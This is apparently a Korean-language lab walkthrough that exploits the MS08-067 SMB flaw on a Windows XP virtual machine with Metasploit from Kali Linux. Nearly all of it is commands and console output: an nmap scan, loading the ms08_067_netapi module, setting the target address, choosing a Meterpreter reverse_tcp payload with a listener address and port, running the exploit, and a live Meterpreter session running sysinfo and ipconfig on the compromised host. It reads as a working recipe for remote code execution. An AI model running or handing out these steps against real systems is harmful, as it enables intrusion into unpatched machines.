MS08-067 Sploit

칼리 리눅스 또는 백트랙에서 진행합니다.

metasploit 홈페이지

MS08-067 취약점
https://technet.microsoft.com/library/security/ms08-067
https://www.rapid7.com/db/modules/exploit/windows/smb/ms08_067_netapi

호스트 포트 스캔

root@kali:~# nmap -v -sT 200.200.200.44

Starting Nmap 7.01 ( https://nmap.org ) at 2016-03-16 22:01 EDT
Initiating ARP Ping Scan at 22:01
Scanning 200.200.200.44 [1 port]
Completed ARP Ping Scan at 22:01, 0.00s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 22:01
Completed Parallel DNS resolution of 1 host. at 22:01, 0.33s elapsed
Initiating Connect Scan at 22:01
Scanning 200.200.200.44 [1000 ports]
Discovered open port 445/tcp on 200.200.200.44
Discovered open port 139/tcp on 200.200.200.44
Completed Connect Scan at 22:01, 4.63s elapsed (1000 total ports)
Nmap scan report for 200.200.200.44
Host is up (0.00084s latency).
Not shown: 998 filtered ports
PORT    STATE SERVICE
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 00:0C:29:67:81:BB (VMware)

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 5.05 seconds
           Raw packets sent: 1 (28B) | Rcvd: 1 (28B)

호스트 Metasploit

1. msfconsole 실행

A database appears to be already configured, skipping initialization
                                                  
     ,           ,
    /             \
   ((__---,,,---__))
      (_) O O (_)_________
         \ _ /            |\
          o_o \   M S F   | \
               \   _____  |  *
                |||   WW|||
                |||     |||


Tired of typing 'set RHOSTS'? Click & pwn with Metasploit Pro
Learn more on http://rapid7.com/metasploit

       =[ metasploit v4.11.5-2016010401                   ]
+ -- --=[ 1517 exploits - 875 auxiliary - 257 post        ]
+ -- --=[ 437 payloads - 37 encoders - 8 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf > 

2. ms08_067_netapi 실행

msf > use exploit/windows/smb/ms08_067_netapi 
msf exploit(ms08_067_netapi) >

3. 옵션 확인 & 공격 대상 호스트 IP 설정

msf exploit(ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST                     yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting


msf exploit(ms08_067_netapi) >
msf exploit(ms08_067_netapi) > set RHOST 200.200.200.44
RHOST => 200.200.200.44
msf exploit(ms08_067_netapi) >

4. Playload 를 reverse_tcp로 선택

msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp

5. 옵션 확인

msf exploit(ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    200.200.200.44   yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique: seh, thread, process, none
   LHOST                      yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting


msf exploit(ms08_067_netapi) >

6. Payload IP / Port 설정
 . 리스닝 호스트 IP / Port 설정
  → 포트번호는 아무거나 상관없음

msf exploit(ms08_067_netapi) > set LHOST 200.200.200.61
LHOST => 200.200.200.61
msf exploit(ms08_067_netapi) > set LPORT 4444
LPORT => 4444
msf exploit(ms08_067_netapi) >

7. exploit
 → 공격대상 호스트와 세션 연결됨

msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 200.200.200.61:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 3 - lang:Korean
[*] Selected Target: Windows XP SP3 Korean (NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (957487 bytes) to 200.200.200.44
[*] Meterpreter session 1 opened (200.200.200.61:4444 -> 200.200.200.44:4290) at 2016-03-17 11:44:25 -0400

meterpreter >

meterpreter

meterpreter > sysinfo
Computer        : KJK-9EB673B1C66
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : ko_KR
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/win32
meterpreter > ipconfig

Interface  1
============
Name         : MS TCP Loopback interface
Hardware MAC : 00:00:00:00:00:00
MTU          : 1520
IPv4 Address : 127.0.0.1


Interface  2
============
Name         : AMD PCNET Family PCI Ethernet Adapter 
Hardware MAC : 00:0c:29:67:81:bb
MTU          : 1500
IPv4 Address : 200.200.200.44
IPv4 Netmask : 255.255.255.0

meterpreter >